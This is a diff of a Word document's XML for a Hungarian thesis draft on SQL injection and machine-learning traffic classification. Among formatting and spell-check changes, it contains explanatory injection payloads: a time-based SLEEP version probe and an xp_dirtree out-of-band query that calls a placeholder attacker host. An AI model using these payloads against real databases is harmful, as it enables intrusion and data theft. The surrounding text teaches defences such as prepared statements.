+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>=1-IF(MID(VERSION(),1,1)=’5’, SLEEP(15),0)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5445,7 +6144,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>, amely esetén ha a kiszolgáló válasza legalább 15 másodpercet vesz igénybe, megállapíthatjuk, hogy ez az adatbázis-kiszolgáló a MySQL 5.x verzióját futtatja.</w:t>
+        <w:t xml:space="preserve">, amely esetén ha a kiszolgáló válasza legalább 15 másodpercet vesz igénybe, megállapíthatjuk, hogy ez az adatbázis-kiszolgáló a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>MySQL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 5.x verzióját futtatja.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5460,7 +6173,7 @@
         <w:pStyle w:val="Stlus3"/>
         <w:ind w:left="709" w:hanging="709"/>
       </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc71019996"/>
+      <w:bookmarkStart w:id="10" w:name="_Toc71124911"/>
       <w:r>
         <w:t>Sávon kívüli (</w:t>
       </w:r>
@@ -5468,12 +6181,25 @@
         <w:t>out-of</w:t>
       </w:r>
       <w:r>
-        <w:t>-band)</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> SQLi</w:t>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>band</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>SQLi</w:t>
       </w:r>
       <w:bookmarkEnd w:id="10"/>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5554,6 +6280,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> például a Microsoft SQL Server </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -5562,6 +6289,7 @@
         </w:rPr>
         <w:t>xp_dirtree</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -5677,7 +6405,43 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">https://example.com/products.aspx?id=1;EXEC master..xp_dirtree '\\test.attacker.com\' </w:t>
+        <w:t xml:space="preserve">https://example.com/products.aspx?id=1;EXEC </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>master</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>..</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>xp_dirtree</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> '\\test.attacker.com\' </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5712,7 +6476,79 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">SELECT * FROM product WHERE id=1;EXEC master..xp_dirtree ’\\test.attacker.com\’ </w:t>
+        <w:t xml:space="preserve">SELECT * FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>product</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">=1;EXEC </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>master</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>..</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>xp_dirtree</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ’\\test.attacker.com\’ </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5836,7 +6672,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc71019997"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc71124912"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5954,13 +6790,47 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Elkészített utasítások (prepared statements) használata</w:t>
-      </w:r>
+        <w:t>Elkészített</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>utasítások</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (prepared statements) </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>használata</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6027,12 +6897,14 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>boolean-based</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -6214,13 +7086,47 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Tárolt eljárások (stored procedures) használata</w:t>
-      </w:r>
+        <w:t>Tárolt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>eljárások</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (stored procedures) </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>használata</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6327,6 +7233,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> az </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -6335,6 +7242,7 @@
         </w:rPr>
         <w:t>sp_getAccountBalance</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -6441,13 +7349,47 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Engedélyezőlista (allow-list) bemenetének ellenőrzése</w:t>
-      </w:r>
+        <w:t>Engedélyezőlista</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (allow-list) </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>bemenetének</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>ellenőrzése</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6564,7 +7506,35 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> („bind variables”).</w:t>
+        <w:t xml:space="preserve"> („</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>bind</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>variables</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>”).</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6684,6 +7654,7 @@
         </w:rPr>
         <w:t xml:space="preserve">különböző ágakban vizsgálja a </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -6698,7 +7669,16 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">ableName </w:t>
+        <w:t>ableName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6837,8 +7817,97 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Az összes felhasználó által adott bemenet elkerülése</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Az </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>összes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>felhasználó</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>által</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>adott</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>bemenet</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>elkerülése</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6952,7 +8021,7 @@
         </w:numPr>
         <w:ind w:left="284" w:hanging="284"/>
       </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc71019998"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc71124913"/>
       <w:r>
         <w:t>GÉPI TANULÁS</w:t>
       </w:r>
@@ -6967,22 +8036,6 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Mi a gépi tanulás?</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -7019,92 +8072,52 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Hogyan működik a gépi tanulás? (4)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>A gépi tanulás (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>vagy modell) felépítésének négy alapvető lépése van</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="567"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="567"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Gépi tanulási módszerek </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>(3)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="567"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A g</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>épi tanulási módszerek</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">nek három fő kategóriájuk van: felügyelt, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>felügyelet nélküli és félig felügyelt tanulás.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Az implementált programom a legelső módszert használja, így a fejezetben </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ehhez adok </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">szélesebb körű </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ismeretet.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7132,7 +8145,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="13" w:name="_Toc71019999"/>
+      <w:bookmarkStart w:id="13" w:name="_Toc71124914"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7159,77 +8172,14 @@
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Mi a felügyelt tanulás?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Hogyan működik a felügyelt tanulás?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Felügyelt tanulási algoritmusok (7)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>F</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>elügyelt tanulás során c</w:t>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Felügyelt tanulás során c</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7241,13 +8191,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Ez a típusú</w:t>
+        <w:t xml:space="preserve"> Ez a típusú</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7259,13 +8203,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> fent említett hálózati forgalom osztályozás</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>a által.</w:t>
+        <w:t xml:space="preserve"> fent említett hálózati forgalom osztályozása által.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7274,9 +8212,389 @@
         <w:ind w:firstLine="567"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Általánosságban a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> gépi tanulás felépítésének négy alapvető lépése van</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>. Az első a tanuló adatok gyűjtése és előkészítése. A konkrét példák gyűjtése után előkészítéskor a példák két részhalmazba kerülnek</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> felügyelt tanulás során</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>„</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>train</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>”, „test”. A címkézett adatok („</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>train</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">”) az algoritmus tanítására szolgálnak. Hálózati </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>biz</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">tonsági kontextusban </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a két címke – a fenti példából adódóan – a normál és a veszélyes adatforgalom. A nem címkézett adatokat („test”) az algoritmus önállóan címkézi fel, ezzel tesztelve, hogy a megállapítása jó-e vagy rossz. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A második és harmadik lépés az algoritmus kiválasztása és annak betanítása. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Az algoritmus típusa</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> többek között</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> függ a képzési adatkészlet típusától</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>az adatok mennyiségétől, valamint a megoldandó probléma típusától.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Az algoritmus oktatása iteratív folyamat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, amely </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>magában foglalja a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>…</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Az így kapott betanított, pontos algoritmus a gépi tanulási modell</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
